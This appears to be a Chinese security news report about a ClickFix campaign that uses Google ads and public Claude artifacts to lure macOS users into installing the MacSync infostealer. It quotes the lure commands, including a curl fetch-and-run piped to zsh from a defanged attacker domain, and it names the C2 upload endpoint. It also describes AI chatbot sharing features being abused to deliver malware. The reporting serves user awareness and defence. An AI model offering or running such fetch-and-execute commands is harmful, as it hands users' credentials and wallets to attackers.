
黑客正借助Claude共享内容与谷歌广告发起ClickFix攻击,向搜索特定关键词的macOS用户分发信息窃取类恶意软件。研究人员已在野外发现至少两种攻击变体,超过1万名用户访问过包含危险指令的恶意内容。
Claude 共享内容(Claude artifact)是指由用户通过Anthropic大语言模型生成并公开的内容,形式包括指令、教程、代码片段等。这类内容独立于主对话界面,任何人都可通过claude.ai域名下的链接直接访问。
该类页面会提示用户:所展示内容由用户生成,未经准确性验证。
研究人员发现,在谷歌搜索中,“在线DNS解析器”“macOS命令行磁盘空间分析工具”“HomeBrew”等关键词均出现了恶意推广结果。
![]()
恶意 HomeBrew 搜索结果
这些搜索结果会跳转到公开的Claude共享内容,或冒充苹果官方支持的Medium文章。两种页面都会诱导用户在终端中粘贴并执行Shell命令。
第一种攻击变体诱导执行的命令为:
echo "..." | base64 -D | zsh
第二种为:
true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh
![]()
第二种攻击变体使用伪造苹果支持页面
研究人员发现,该恶意Claude教程页面浏览量已至少达到15600次,这一数据可大致反映受骗用户规模。根据几天前观测到的该页面显示,浏览量为12300次。
![]()
Claude 对话中托管的 ClickFix 攻击引导页面
在终端执行上述命令后,系统会下载一个MacSync信息窃取木马的加载器,用于窃取设备上的敏感数据。
研究人员表示,该木马使用硬编码令牌与API密钥连接命令与控制(C2)基础设施,并伪造macOS浏览器UA以伪装成正常流量。
命令执行结果会直接传递给osascript,由AppleScript负责执行实际的窃取行为,包括钥匙串、浏览器数据、加密货币钱包等信息。”
窃取的数据会打包为/tmp/osalogging.zip,通过HTTP POST请求上传至攻击者C2服务器a2abotnet[.]com/gate。若传输失败,压缩包会被拆分为多个小块并重试8次。上传成功后,程序会执行清理操作,抹除所有痕迹。
两种攻击变体均从同一C2地址下载第二阶段载荷,表明背后是同一威胁组织所为。 此前已有类似攻击活动利用ChatGPT、Grok的对话分享功能分发AMOS信息窃取木马。2025年12月,研究人员就发现攻击者利用ChatGPT与Grok对话分享链接,针对macOS用户发动ClickFix攻击。
此次攻击开始滥用Claude,表明大模型滥用已扩散至更多主流平台。安全研究人员提醒用户保持谨慎,不要在终端执行来源不明或无法完全理解的命令。而在同一对话中向聊天机器人询问命令是否安全,是简单有效的判断方法。
参考及来源:https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/
特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。
Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.